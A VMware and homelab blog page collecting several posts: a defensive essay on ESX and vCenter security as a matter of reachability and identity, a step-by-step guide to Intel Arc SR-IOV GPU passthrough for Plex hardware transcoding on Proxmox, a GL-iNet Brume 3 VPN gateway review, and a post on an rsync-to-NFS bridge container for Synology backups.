# vNinja.net | VMware, VCF & Homelab

---

# ESX Security Advice that Actually Matters in 2026

URL: https://vNinja.net/2026/05/12/esxi-security-advice-that-actually-matters-in-2026/
Date: 2026-05-12
Author: christian
Tags: vmware, vcf, virtual-infrastructure, attack-surface, identity, security-model

VMware ESX runs directly on physical hardware as a type-1 hypervisor that sits beneath all virtual machines and arbitrates their access to CPU, memory, storage, and networking. Every workload in the environment ultimately depends on it, meaning that compromising ESX is not just gaining access to a single system but gaining control over the entire virtualized infrastructure. From that position, an attacker can start, stop, modify, or observe VMs, manipulate virtual disks, and effectively operate outside the visibility of most guest-based security controls. This is why ESX is consistently considered a high-value target in security discussions: it concentrates control of many critical systems into a single layer, making any compromise disproportionately impactful.

There is no shortage of ESX security advice out there. If you search for it, you will find the same ideas repeated in slightly different forms: long checklists, hardening guides, compliance-driven baselines, and “best practices” that converge on a familiar formula. Disable what you can, patch what you must, restrict everything, and assume that enough configuration equals security. On paper, it looks complete. Structured even. In practice, it rarely reflects how environments actually fail.

At a certain point, ESX security stops being a question of host configuration and becomes a question of reachability and control. Not what is enabled on the hypervisor itself, but who can reach it, how they got there, and what else they already control by the time they do. Most ESX security incidents do not begin with a hypervisor exploit.
They begin much earlier in the chain, usually through identity issues, exposure creep, or assumptions about network trust that no longer match how environments are actually operated. Once you have seen enough real-world cases, the pattern becomes hard to ignore. ESX is rarely the entry point. It is where control is consolidated after everything else has already gone wrong. This theme also shows up in operational discussions from VMUG Connect 2026 in Amsterdam, especially around the gap between designed security models and how infrastructure behaves in reality.

## The actual attack path model

Most ESX environments do not break in a straight line. They fail through a predictable control chain that gradually expands access until ESX is no longer meaningfully protected.

```mermaid
flowchart LR
    A[Identity - AD / SSO / Credentials] --> B[vCenter Server]
    B --> C[ESX Hosts]
    C --> D[Backups & Recovery Systems]
```

Once identity is compromised, vCenter becomes reachable. Once vCenter is reachable, ESX is effectively under administrative control. From there, backups become the final boundary that determines whether recovery is possible at all. The important detail is not the sequence itself, but how quickly it collapses once identity is no longer trustworthy.

## ESX is almost never where the story begins

In environments that actually get compromised, ESX is rarely the first system involved. It is almost never the initial point of entry and often not even the second. Instead, it sits further down the chain, waiting until other assumptions in the environment have already failed. Initial access is usually far less interesting than people expect. It is rarely a targeted hypervisor attack and more often a sequence of ordinary failures that accumulate over time.
A compromised administrative account that was never rotated, reused or leaked credentials that still work across systems, phishing that was only partially contained, or management interfaces that quietly became reachable as networks evolved. By the time an attacker interacts with ESX, they typically already have what matters: valid credentials, network reach, or access to vCenter. At that point, ESX is no longer being broken into. It is being accessed through paths that were never properly constrained in the first place.

ESX access paths also do not always align with modern identity expectations. While vCenter can integrate with federated identity systems and multi-factor authentication, ESX itself still exposes local and SSH-based access paths that rely on direct credential validation. This is a key difference in how authentication behaves across the stack. ESX does not natively enforce multi-factor authentication on these direct management interfaces. In practice, that means SSH or local console access is typically protected only by username and password, even in environments where the broader identity layer is fully federated. Once valid credentials exist for those paths, authentication is complete. No additional identity verification layer is applied at the host level.

This pattern is consistent with incident analysis such as It is All Fun and Games Until Someone Gets Root, where the meaningful failure happens long before the final escalation event and attackers rely on living-off-the-land techniques. This also aligns with attacker behaviour models described in MITRE ATT&CK.

## Exposure is still the thing that breaks environments

If there is one recurring theme across ESX incidents, it is exposure. Not theoretical vulnerabilities, but practical reachability problems that evolve slowly over time. Security thinking often fails here because each individual change feels reasonable in isolation.
A routing exception, a temporary admin path, a network shortcut that was meant to be short-lived but never revisited. None of it looks dangerous on its own, but over time it becomes something else entirely. Management interfaces that were meant to remain isolated gradually become reachable as networks evolve. VPNs start behaving as implicit trust boundaries. Internal networks are treated as safe by default. Jump hosts exist, but are not consistently enforced. Individually, none of these decisions feel significant. Taken together, they define whether ESX is actually protected or merely assumed to be protected.

The uncomfortable truth remains simple: most compromises do not require breaking ESX. They require reaching it.

## vCenter quietly becomes the real target

Although this discussion is framed around ESX, it rarely ends there. In most environments, vCenter sits at the center of operational control. If vCenter is compromised, ESX security becomes largely irrelevant in practical terms. At that point, ESX is no longer the point of control. It is the execution layer for decisions made elsewhere in the environment. This is explored in more detail in vCenter Is the Real Crown Jewel, where the control-plane impact is examined in the context of real compromise behavior and management-plane access paths.

Official guidance:

- Securing ESX hosts
- Securing vCenter

## The small set of things that actually matter

Management plane isolation, identity control, backups, visibility, and segmentation determine most outcomes. Each of these only matters in practice when it is enforced consistently, not assumed by design.

## Visibility is still the hardest problem

There is a recurring assumption in ESX environments that logging equals visibility. In practice, the gap between the two is still significant. ESX does generate logs across multiple subsystems, but they are fragmented, distributed, and not designed for straightforward operational monitoring.
Even basic investigation often requires correlating events across multiple files and services, and that assumes you already know what you are looking for. A useful reference for how ESX logging is structured highlights this complexity directly: https://knowledge.broadcom.com/external/article/306962/location-of-esxi-log-files.html

The practical reality is that ESX logs are rarely consumed continuously. They are typically collected centrally, if at all, and used in retrospective analysis rather than real-time detection. That creates a structural delay between activity and understanding. In other words, ESX is observable, but not easily operationally observable. This becomes more important as attack patterns shift toward quieter lateral movement and credential-driven access rather than noisy exploitation. Without strong correlation across identity, vCenter, and host-level activity, most environments are effectively blind until after the fact.

## Moving toward hypervisor-level telemetry

This visibility gap is also being acknowledged at the platform level. With vSphere in VMware Cloud Foundation 9.1, ESX is beginning to support deeper integration with third-party endpoint detection and response tooling directly at the hypervisor layer. This includes the ability to observe process activity, file system changes, and network events within the ESX execution context.

> EDR Integration: Secure, supported framework allowing third-party EDR agents to integrate directly into the ESX hypervisor, enabling leading EDR platforms to natively analyze process, file, and network events for suspicious activity right at the foundational layer for granular, high-fidelity visibility into guest OS behavior and workload activity

https://www.vmware.com/docs/vmw-vsphere-datasheet

How this will look going forward is still uncertain, but it shows intent from VMware by Broadcom to further secure ESX on the appliance/hypervisor layer.
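Getting logs off the host at all is the first step toward closing that gap. As a minimal configuration sketch, per-host forwarding can be set up with esxcli; the collector address `tcp://syslog.example.com:514` is an illustrative placeholder, and your transport and port will differ:

```
# Point the host's syslog at a central collector (placeholder address),
# allow outbound syslog through the host firewall, and reload the service.
esxcli system syslog config set --loghost='tcp://syslog.example.com:514'
esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true
esxcli system syslog reload

# Confirm the configured target
esxcli system syslog config get
```

This only moves the data; the correlation across identity, vCenter, and host activity still has to happen on the collector side.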
## CVEs matter, but not in isolation

ESX vulnerabilities tend to attract attention when they appear, especially high-impact issues affecting management services or guest escape paths. But real-world impact depends heavily on context. A vulnerability requiring authentication behaves very differently from a pre-authentication remote exploit. A host-level issue is not equivalent to a control-plane compromise path. And none of it matters if the system is not reachable in the first place. For reference, vulnerabilities are tracked through public CVE databases and vendor advisories:

- https://www.cve.org/CVERecord/SearchResults?query=esxi+and+esx
- https://www.vmware.com/security/advisories.html

In practice, prioritisation tends to follow a simpler model than most frameworks suggest: exposure first, exploitability second, severity last. This is closer to how incidents actually unfold than how vulnerability reports are usually consumed.

## What compromise actually looks like

SSH changes without operational intent, snapshots created outside expected workflows, configuration drift across hosts, datastore anomalies, or API activity that does not match administrative behaviour. Individually, none of these confirm compromise. Together, they tend to form a pattern that only becomes obvious after the fact.

## Closing thought

Most environments are not compromised because of zero-days. They’re compromised because the management plane was reachable. ESX security is often treated as a hardening problem. In practice, it behaves more like an access problem layered on top of an operational system. Don’t get me wrong, hardening is important, but it’s not the be-all and end-all it is made out to be. The real question is not how many controls are enabled or disabled. It is whether the management plane is actually constrained in practice, and whether you would notice quickly if that assumption stopped being true. That is what actually matters in 2026.
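One way to keep that assumption honest is to test reachability from a segment that should not have it. A rough sketch of the idea (192.0.2.10 is a documentation-range placeholder; substitute your own vCenter and ESX management addresses, and run it from the network you believe is isolated):

```shell
#!/bin/sh
# Probe the usual vSphere management ports (SSH, HTTPS, 902) from a
# segment that should NOT reach them. Any "open" result means the
# isolation assumption has drifted.
probe() {
    host="$1"; port="$2"
    if nc -z -w 2 "$host" "$port" 2>/dev/null; then
        echo "open $host:$port"
    else
        echo "closed $host:$port"
    fi
}

for p in 22 443 902; do
    probe 192.0.2.10 "$p"
done
```

Scheduled from cron on a jump-host-adjacent machine, three lines of output per host is enough to notice when "closed" quietly turns into "open".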
---

# VCF Security Reality Check: What This Series Covers

URL: https://vNinja.net/2026/05/12/vcf-security-reality-check/
Date: 2026-05-12
Author: christian
Tags: vmware, vcf, virtual-infrastructure, attack-surface, identity, security-model

This series looks at security in VMware Cloud Foundation environments through three connected layers:

- ESX as the execution layer
- vCenter as the control layer
- Identity as the reachability layer

It does not attempt to cover every component in the VCF stack. NSX/vDefend, vSAN, and other services may exist in these environments, but they are not the focus here. The focus is narrower, and intentionally so. Most real-world compromise scenarios in virtualized infrastructure do not begin with individual product weaknesses. They begin with access paths that already exist, and identity that already works. From there, control expands through normal administrative interfaces rather than through exploitation of isolated components. This series assumes that model from the start. It also assumes that compromise is more likely to occur through valid access than through broken systems. That distinction is important, because it changes where security effort actually matters in practice.

## The industry still over-focuses on exploits

Most public discussion around VMware security revolves around patching, CVEs, and the possibility of hypervisor-level exploits. Those things matter. But they also receive disproportionate attention because they are visible, measurable, and easy to communicate. Real-world compromise paths are usually less dramatic. Most environments are not lost because attackers discovered an unknown ESX vulnerability. They are lost because identity, management access, segmentation, and operational trust relationships quietly drifted into reachable states over time. In practice, compromise is far more likely to happen through valid access than through novel exploitation.
That distinction matters because it changes where defensive effort actually produces meaningful risk reduction.

## How to read this series

Each post focuses on one layer of the model:

- ESX — execution and why it is a high-value target
- vCenter — control concentration and operational impact (not published yet)
- Identity — reachability, federation, and access paths (not published yet)
- Closing the loop — how identity, vCenter, and ESX connect into a single attack path model, and what it means when the entire control plane is viewed as one continuous system rather than separate security domains (not published yet)

Together, they describe how control behaves in practice once environments scale beyond a single system.

## Core assumption

The underlying assumption throughout is simple: if identity is valid, the rest of the stack behaves as designed. ESX executes instructions. vCenter defines operational intent. Identity determines whether either becomes reachable at all.

## Closing note

This is not a compliance guide, and it is not a configuration checklist. It is a model of how control actually behaves once infrastructure is in use, in the real world.

---

# Intel Arc SR-IOV Hardware Transcoding with Plex on Proxmox VE

URL: https://vNinja.net/2026/05/07/intel-arc-sr-iov-hardware-transcoding-with-plex-on-proxmox-ve/
Date: 2026-05-07
Author: christian
Tags: proxmox, plex, intel, sr-iov, nuc

My homelab has three new additions: ASUS NUC 15 Pro units, each with an Intel Core Ultra 7 255H CPU. They are surprisingly capable machines, and getting proper hardware transcoding working in Plex using the built-in Intel® Arc™ 140T GPU was high on the list. It took longer than expected to get it all sorted, but the end result is solid. All three NUCs run Proxmox VE 9.x in a cluster. The Intel Core Ultra 7 255H has an Intel Arc iGPU based on the Arrow Lake-P architecture, with PCI device ID 8086:7d51.
This is an integrated GPU sharing the same die as the CPU, which matters for how passthrough works.

## What is SR-IOV and Why Use It?

The obvious approach for GPU passthrough is to assign the entire GPU to a single VM. That works, but it creates a strict 1:1 relationship. One GPU, one VM, host loses access entirely. No display output from the NUC, no GPU for other VMs or containers, a permanent commitment of the hardware to one workload.

SR-IOV (Single Root I/O Virtualization) solves both problems. A single physical GPU presents itself as multiple independent virtual devices simultaneously. The host keeps the physical function, so display output works normally. Up to 7 additional virtual functions can be assigned to different VMs or containers at the same time, giving a total of 8 GPU devices: one for the host and seven for guests. Each virtual function gets access to the full GPU execution engines, but time on those engines is scheduled dynamically based on demand. When only one VM is transcoding, it gets full GPU bandwidth. When multiple VMs are active, the GPU scheduler divides time between them automatically. No hard per-VF resource guarantees, closer to CPU time-sharing than static partitioning. In practice for a Plex server in a homelab this works well, since transcoding workloads are bursty rather than constant.

SR-IOV on Intel integrated GPUs is not enabled in the stock Linux driver. It requires a patched version of i915, which is what the i915-sriov-dkms project provides.

## Host Setup

The first hurdle was the BIOS. On the NUC 15 Pro, the virtualization settings are not where you would expect on a desktop board. VT-d is under Security rather than Advanced, and the Virtual Display Emulation setting (which keeps the iGPU active with no monitor connected) is under Advanced > Video. Both are required.

On the Proxmox side, three things need to be in place:

- i915-sriov-dkms patches the i915 kernel driver to enable SR-IOV virtual functions. Version 2026.05.06 supports Proxmox kernel 6.17 through 7.0. Always check the releases page for the latest version and supported kernel range before upgrading the host kernel.
- Kernel parameters tell i915 to claim the Arrow Lake GPU and prevent the newer xe driver from taking it first. The force_probe=7d51 flag targets the exact device ID, module_blacklist=xe keeps xe out, and i915.max_vfs=7 sets the number of virtual functions.
- A systemd service loads i915 and creates the virtual functions at boot. Sysfsutils turned out to be unreliable here since i915 needs to be fully loaded before the VF count can be set, and the ordering is not guaranteed without an explicit dependency chain. The systemd service handles this cleanly.

After a reboot: eight VGA devices in lspci, one physical function on the host, seven virtual functions ready to assign.

```
~# lspci | grep VGA
00:02.0 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.1 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.2 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.3 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.4 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.5 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.6 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
00:02.7 VGA compatible controller: Intel Corporation Arrow Lake-P [Intel Graphics] (rev 03)
```

Note: vainfo does not work on the Proxmox host itself. The physical GPU function is claimed by i915 for SR-IOV management, not media. Run vainfo inside the VM to verify the VF is working.

## Proxmox Host Setup Commands

Detailed Instructions

Note: Perform these steps on each Proxmox host independently.
### BIOS Settings

| Location | Setting | Value |
| --- | --- | --- |
| Security > Security Features | Intel Virtualization Technology (VT-x) | Enabled |
| Security > Security Features | Intel VT for Directed I/O (VT-d) | Enabled |
| Advanced > Video | Virtual Display Emulation | Enabled |
| Boot | Secure Boot | Disabled |
| Boot | Fast Boot | Disabled |

After saving, perform a full cold boot.

### Verify IOMMU

```
dmesg | grep -e "IOMMU enabled" -e "Directed I/O"
```

Expected output:

```
DMAR: IOMMU enabled
DMAR: Intel(R) Virtualization Technology for Directed I/O
```

### Install i915-sriov-dkms

```
apt update && apt install -y dkms build-essential
apt install -y pve-headers-$(uname -r)
wget -O /tmp/i915-sriov-dkms.deb \
  "https://github.com/strongtz/i915-sriov-dkms/releases/download/2026.05.06/i915-sriov-dkms_2026.05.06_amd64.deb"
dpkg -i /tmp/i915-sriov-dkms.deb
dkms install i915-sriov-dkms/2026.05.06 -k $(uname -r) --force
dkms status
```

### Configure Kernel Parameters

Edit /etc/default/grub and set GRUB_CMDLINE_LINUX_DEFAULT to:

```
GRUB_CMDLINE_LINUX_DEFAULT="quiet intel_iommu=on iommu=pt i915.enable_guc=3 i915.max_vfs=7 i915.force_probe=7d51 module_blacklist=xe"
```

Then apply:

```
update-grub
update-initramfs -u -k all
```

### Create SR-IOV Boot Service

```
cat > /etc/systemd/system/i915-sriov.service << 'EOF'
[Unit]
Description=Intel i915 SR-IOV VF Setup
After=systemd-modules-load.service
After=local-fs.target

[Service]
Type=oneshot
RemainAfterExit=yes
ExecStart=/sbin/modprobe i915
ExecStartPost=/bin/sh -c 'sleep 2 && echo 7 > /sys/bus/pci/devices/0000:00:02.0/sriov_numvfs'

[Install]
WantedBy=multi-user.target
EOF

systemctl enable i915-sriov
reboot
```

### Verify After Reboot

```
lspci | grep VGA | wc -l                             # Expected: 8
cat /sys/bus/pci/devices/0000:00:02.0/sriov_numvfs   # Expected: 7
lspci -nnk -s 00:02.0 | grep "driver in use"         # Expected: i915
systemctl status i915-sriov                          # Expected: active (exited)
```

## VM Setup and the Kernel

When creating the VM in Proxmox, a few settings are critical:

| Setting | Value | Why |
| --- | --- | --- |
| Machine type | q35 | Required for PCIe passthrough. The default i440fx does not support PCIe, so the VF cannot be exposed to the VM |
| BIOS | OVMF (UEFI) | Required to control Secure Boot |
| Pre-Enrolled Keys | Unchecked | Disables Secure Boot. The DKMS module is unsigned and will not boot with Secure Boot enabled |
| Graphics Card | VirtIO-GPU (default also works) | Provides the VM console display independently of the passed-through VF |
| CPU type | host | Exposes the real CPU to the VM, required for the i915 driver to work correctly |
| Ballooning | Disabled | Recommended for GPU VMs. Dynamic memory reclamation can cause instability when a driver has pinned GPU memory |

The PCI device to add is 0000:00:02.1 (or another unassigned device ID 0000:00:02.x). Never use 00:02.0, that is the physical function which must stay on the host. PCI-Express checked, All Functions and Primary GPU left unchecked.

Two Ubuntu versions have been tested and confirmed working:

- Ubuntu 26.04 LTS with the stock kernel 7.0, no extra steps needed
- Ubuntu 24.04 LTS with mainline kernel 6.17 from kernel.ubuntu.com

Ubuntu 24.04’s default kernel 6.8 predates Arrow Lake SR-IOV VF support entirely, which is why the mainline kernel step is needed. Ubuntu 26.04 ships kernel 7.0 as its default and the DKMS module builds cleanly against it. An in-place upgrade from 24.04 to 26.04 is not yet available as of May 2026, so a fresh install is the only option for 26.04. That the Proxmox hosts run kernel 7.0 does not mean Ubuntu’s kernel 7.0 behaves identically. The i915-sriov-dkms module targets specific kernel builds, and Ubuntu’s packaging can differ enough to cause build failures. Always verify dkms status shows the module as installed before rebooting into a new kernel.
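That pre-reboot verification is easy to script. A minimal sketch (the helper name is mine, and it assumes the usual dkms status line format of `module/version, kernel, arch: installed`):

```shell
#!/bin/sh
# Refuse to proceed with a reboot unless dkms reports the i915-sriov-dkms
# module as installed for the given kernel version.
dkms_ready_for() {
    kernel="$1"
    dkms status 2>/dev/null \
        | grep 'i915-sriov-dkms' \
        | grep "$kernel" \
        | grep -q 'installed'
}

# Example: dkms_ready_for "$(uname -r)" && reboot
```

Run it against the new kernel version after installing its headers, not against the currently running one.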
Verification inside the VM with vainfo confirms the hardware pipeline is working:

```
vainfo: Driver version: Intel iHD driver for Intel(R) Gen Graphics - 26.1.2
vainfo: Supported profile and entrypoints
      VAProfileH264Main     : VAEntrypointVLD
      VAProfileH264Main     : VAEntrypointEncSlice
      VAProfileHEVCMain     : VAEntrypointVLD
      VAProfileHEVCMain     : VAEntrypointEncSlice
      VAProfileAV1Profile0  : VAEntrypointVLD
      VAProfileAV1Profile0  : VAEntrypointEncSlice
      ...
```

Both VLD (decode) and EncSlice (encode) entries for H264, HEVC, and AV1 confirm the full hardware pipeline is available.

## Plex VM Setup Commands

Detailed installation

Note: These steps apply to Ubuntu 26.04. For Ubuntu 24.04, install mainline kernel 6.17 from kernel.ubuntu.com before installing i915-sriov-dkms.

### Install build tools and DKMS

```
sudo apt update && sudo apt upgrade -y
sudo apt install -y dkms build-essential wget gcc-14 linux-headers-$(uname -r)
```

### Install i915-sriov-dkms

Note: Verify the latest version of i915-sriov-dkms and update the URL accordingly.

```
wget -O /tmp/i915-sriov-dkms.deb \
  "https://github.com/strongtz/i915-sriov-dkms/releases/download/2026.05.06/i915-sriov-dkms_2026.05.06_amd64.deb"
sudo dpkg -i /tmp/i915-sriov-dkms.deb
sudo dkms install i915-sriov-dkms/2026.05.06 -k $(uname -r) --force
dkms status
```

### Configure i915 for the VF

```
sudo su -
echo "options i915 force_probe=7d51" > /etc/modprobe.d/i915.conf
echo "blacklist xe" >> /etc/modprobe.d/i915.conf
update-initramfs -u
exit
sudo reboot
```

### Verify after reboot

```
uname -r
lspci -nnk | grep -A3 "01:00.0"
sudo dmesg | grep -i "sriov\|guc\|huc" | head -5
sudo vainfo --display drm --device /dev/dri/renderD128
```

Expected dmesg output:

```
i915 0000:01:00.0: Running in SR-IOV VF mode
i915 0000:01:00.0: GuC firmware PRELOADED
i915 0000:01:00.0: HuC firmware PRELOADED
```

### Install Intel Media Stack

Note: The Intel GPU repository uses resolute as the apt codename, which corresponds to Ubuntu 26.04. On Ubuntu 24.04 (codename noble), replace resolute with noble in the repository URL.
```
wget -qO - https://repositories.intel.com/gpu/intel-graphics.key | \
  sudo gpg --dearmor -o /usr/share/keyrings/intel-graphics.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/intel-graphics.gpg] \
https://repositories.intel.com/gpu/ubuntu resolute unified" | \
  sudo tee /etc/apt/sources.list.d/intel-graphics.list
sudo apt update
sudo apt install -y vainfo intel-gpu-tools libva-drm2 libva-x11-2 \
  libva-wayland2 va-driver-all intel-media-va-driver-non-free libigdgmm12 libva2
```

### Install Plex Media Server 1.43.2 beta

Note: Plex Pass required. Intel Arc iGPU hardware transcoding on Linux is not available in the current public release of Plex. Use the beta version below.

```
sudo dpkg -i plexmediaserver_1.43.2.10687-563d026ea_amd64.deb
sudo usermod -aG video plex
sudo usermod -aG render plex
sudo systemctl enable --now plexmediaserver
```

### Set hardware device path

```
sudo systemctl stop plexmediaserver
sudo sed -i 's/HardwareDevicePath=""/HardwareDevicePath="\/dev\/dri\/renderD128"/' \
  "/var/lib/plexmediaserver/Library/Application Support/Plex Media Server/Preferences.xml"
sudo systemctl start plexmediaserver
```

In the Plex web UI, go to Settings > Transcoder and enable both hardware acceleration options.

## Plex and Hardware Transcoding

Getting Plex to actually use the GPU was not as straightforward as expected. The VF was working, VAAPI was reporting full codec support, the plex user had access to the render device, hardware acceleration was enabled in settings. And yet Plex kept using software transcoding. The short version: the current public release of Plex Media Server does not support Intel Arc hardware transcoding on Linux. This caught me completely off guard, since the hardware side was working perfectly and everything pointed to a configuration problem rather than a Plex limitation. The fix is in the Plex Media Server 1.43.2.10687 beta, released on May 4, 2026 as a Plex Pass beta release.
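If you hit the same wall, it is worth ruling out the configuration side before suspecting Plex itself. A quick sketch of the checks involved (the helper name is mine; it assumes the render node path used above):

```shell
#!/bin/sh
# Rule out the permission side: the render node must exist and the
# plex user must be in the render group set up with usermod earlier.
check_plex_gpu_access() {
    dev="${1:-/dev/dri/renderD128}"
    [ -e "$dev" ] || { echo "missing render node: $dev"; return 1; }
    id -nG plex | tr ' ' '\n' | grep -qx render \
        || { echo "plex not in render group"; return 1; }
    echo "ok"
}
```

If both checks pass and software transcoding persists, the limitation is on the Plex side, not in the VM.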
## Plex Media Server Changelog

> (Transcoding) Addressed issues hw transcoding on linux using an arrow lake igpu (PM-5197)

Installing this version gets hardware transcoding working immediately. The Plex dashboard shows (hw) next to the active transcode, indicating that hardware transcoding is being used. To confirm hardware transcoding is actually running, check the transcoder statistics log while a stream is active:

```
sudo grep "transcodeHw" \
  "/var/lib/plexmediaserver/Library/Application Support/Plex Media Server/Logs/Plex Transcoder Statistics.log" | tail -3
```

A working setup shows transcodeHwFullPipeline="1" with both transcodeHwDecoding="vaapi" and transcodeHwEncoding="vaapi", confirming both encode and decode are running on the Intel Arc GPU through VAAPI. This is currently a beta release requiring an active Plex Pass subscription. It is expected to reach the public release channel in a subsequent update.

## Upgrading

The DKMS module and the Proxmox kernel are coupled. Before upgrading the Proxmox kernel, check whether the current DKMS version supports it. Install headers for the new kernel and verify the module builds successfully before rebooting. The dkms status output should confirm the module is installed for the new kernel version before committing to the reboot.

The VM kernel is a separate concern. Do not upgrade the Ubuntu guest kernel through distribution channels expecting the same result as the host. Always verify dkms status after any kernel change and check the i915-sriov-dkms releases page for supported kernel ranges.

After any Plex upgrade, verify the bundled iHD driver is still present:

```
find /var/lib/plexmediaserver/ -name "iHD_drv_video.so" 2>/dev/null
```

If hardware transcoding stops working after a Plex update, that is the first place to check.

## The Result

Three NUC hosts running Proxmox VE 9.x with kernel 7.0, i915-sriov-dkms 2026.05.06, and seven SR-IOV virtual functions each. Display output from the HDMI port works normally.
Plex VMs confirmed working on both Ubuntu 24.04 with mainline kernel 6.17 and Ubuntu 26.04 with stock kernel 7.0, both running Plex Media Server 1.43.2.10687. Hardware transcoding confirmed working with a full VAAPI pipeline on all three hosts. VMs can be migrated between hosts with Proxmox offline migration using the force flag; live migration does not work when a PCI device is assigned to the VM. Hardware transcoding works immediately on the destination host without any reconfiguration, since all three NUCs have identical hardware.

---

# GL-iNet Brume 3 (GL-MT5000) VPN Security Gateway: Some Takeaways

URL: https://vNinja.net/2026/04/21/gl-inet-gl-mt5000-vpn-security-gateway/
Date: 2026-04-21
Author: christian
Tags: GL-iNet, Networking, MT5000, Brume 3

At the end of 2025 I received a GL-iNet Brume 3 (GL-MT5000) as part of a beta testing program, and it’s been quietly running in my home network ever since. I didn’t redesign my setup around it or do anything particularly fancy, I simply dropped it into the network alongside my existing gateway to see how it would behave in a real-world environment. It’s clearly designed to sit in the background and just do its job, rather than act as the centerpiece of a network. On paper, the specifications are surprisingly solid for something this compact. The standout feature is the combination of a reasonably capable quad-core CPU and full 2.5 GbE across all Ethernet interfaces. That alone makes it much more interesting than the typical small edge device.

| Description | Details |
| --- | --- |
| Interfaces | 1 x WAN Ethernet port, 2 x LAN Ethernet ports, 1 x USB 3.0 port, 1 x Type-C power port, 1 x Reset button |
| CPU | MediaTek, Quad-core @2.0GHz |
| Memory / Storage | DDR4 1GB / eMMC 8GB |
| Ethernet Speed | 10/100/1000/2500Mbps |
| Power Input | Type-C, 5V/3A |
| Power Consumption | <5W |
| Dimensions | 75 x 92 x 25mm / 148g |

In practice, that translates to a device that feels a bit more “serious” than its size suggests.
The 2.5 GbE ports in particular open up some interesting placement options, whether as a dedicated VPN gateway, a segmented lab router, or simply a high-speed edge node for specific traffic. Out of the box, it supports both OpenVPN and WireGuard, which makes it immediately useful without requiring any custom builds or deep configuration. WireGuard is where it really shines; the performance is excellent.

One of my main use cases right now is running it as a dedicated VPN gateway for a subset of my network. Instead of routing everything through a tunnel, I selectively direct certain clients and VLANs through it. That keeps the rest of the network clean while still giving me flexibility where I need it, since I also use it as a “backup” WireGuard entrypoint to my home network. In fact, I route my rsync-to-nfs container traffic through a WireGuard tunnel handled by the Brume 3 for off-site backups. Compared to pushing the same workload through my UniFi UXG-Lite, the difference is significant and the Brume 3 simply outperforms it.

The Brume 3 is built around a MediaTek quad-core CPU running at 2.0 GHz, giving it a solid amount of headroom for encrypted traffic and sustained throughput. In contrast, the UniFi UXG-Lite uses a Qualcomm IPQ5018 with a dual-core Cortex-A53 clocked at around 1.0 GHz. While that chip is perfectly adequate for routing and light gateway duties, it sits in a lower performance class and isn’t designed for sustained high-throughput VPN workloads. In practice, that gap becomes very noticeable with WireGuard. The Brume 3 benefits from both more cores and significantly higher clock speed, which translates into better handling of encryption and packet forwarding under load. The UXG-Lite, on the other hand, reaches its limits much sooner once real-world overhead is introduced, especially with sustained VPN traffic. That’s ultimately why the Brume 3 performs so much better in my setup.
It isn’t doing anything magical, it simply has more CPU headroom for this kind of workload. Overall, the Brume 3 stands out most when it’s used for what it does best: VPN performance. It’s fast, consistent, and clearly built with encrypted traffic in mind, making it a strong choice for dedicated tunnels and off-site connectivity. At the same time, it’s important to recognize what it doesn’t try to be. Compared to something like the UniFi ecosystem, it lacks the slicker centralized management and the kind of unified control plane that makes managing multiple sites or devices much more streamlined. In that sense, it fits best as a focused, high-performance building block in a larger network rather than a full network management solution on its own. Ultimately, it comes down to selecting the right tool for the job, and for high-throughput VPN workloads, that’s where the Brume 3 really stands out.

And yes, I know this comparison isn’t really fair. The UXG-Lite is not designed for this kind of VPN workload, while the Brume 3 is. I think I might need to get my hands on a new UniFi Express 7 some time soon.

---

# When Synology Says No: Building a Minimal rsync-to-NFS Bridge That Actually Works

URL: https://vNinja.net/2026/04/08/when-synology-says-no-rsync-to-nfs/
Date: 2026-04-08
Author: christian
Tags: rsync, nfs, docker, container, github

There’s a special category of problems that only show up when everything looks like it should just work. This was one of them. The goal wasn’t ambitious. Back up a Synology NAS to a remote NFS share using Hyper Backup. No clever tricks, no exotic setup. Just something simple and predictable. Instead, I ran into one of those quiet limitations that turns a straightforward task into a dead end.

Problem #

Hyper Backup is pretty strict about where it writes data. Not a preference—more like a hard requirement: the destination has to be at the root of a volume. On its own, that doesn’t sound unreasonable.
Until you bring NFS into the picture. Because Synology has its own opinion about that: NFS mounts always land inside a subfolder. No toggle, no workaround, no discussion. Which leaves you stuck between two perfectly valid rules that just don’t agree:

The backup tool insists on a root-level destination
The system won’t let you mount anything at root

And suddenly, a basic backup setup turns into something you can’t actually build.

How I fixed it #

At some point it stopped making sense to fight Synology’s rules. Both sides were behaving exactly as designed, they just weren’t designed to work together. So instead of forcing it, I added a thin layer in between. The solution ended up being a small Docker container that acts as a bridge between rsync and NFS:

It runs an rsync daemon
It mounts the NFS export internally
It writes whatever comes in straight to that mount

From Synology’s point of view, nothing changed. It’s just talking to a regular rsync target. No special configuration, no weird tweaks. Behind the scenes, the container handles the translation and drops the data onto NFS. What makes this work is the separation:

Hyper Backup knows how to talk rsync, not NFS
The container handles that translation
NFS stays exactly what it is: the storage layer

No bending Hyper Backup into something it isn’t. Just giving it something it already understands.

Using It #

The container is available here: https://github.com/h0bbel/rsync-nfs and the README file has all the details. The container image is published and ready to use:

https://ghcr.io/h0bbel/rsync-nfs:latest
https://hub.docker.com/r/h0bbel/rsync-nfs

Run it (I’m running it on Synology itself in Container Manager, but I’ve also tested running it “externally” without problems), point Synology’s Hyper Backup at it using rsync as the backup method, and suddenly the impossible destination becomes just another module.
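For reference, wiring the container up could look something like the compose sketch below. The environment variable names and the host port here are illustrative assumptions on my part; the README in the repository is the authoritative source for the actual configuration.

```yaml
services:
  rsync-nfs:
    image: ghcr.io/h0bbel/rsync-nfs:latest
    privileged: true            # required so the container can mount NFS itself
    ports:
      - "8730:873"              # remap rsync: port 873 is already taken on Synology
    environment:
      NFS_SERVER: "192.168.1.50"     # illustrative: the remote NFS server
      NFS_EXPORT: "/export/backups"  # illustrative: the export mounted inside the container
    restart: unless-stopped
```

Hyper Backup then gets pointed at the NAS IP and the remapped port, and never needs to know NFS is involved.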
Container Contents #

The container is intentionally minimal; the initial release is a total of 55.9 MB when extracted.

Alpine-based image (3.23.3)
rsync daemon frontend
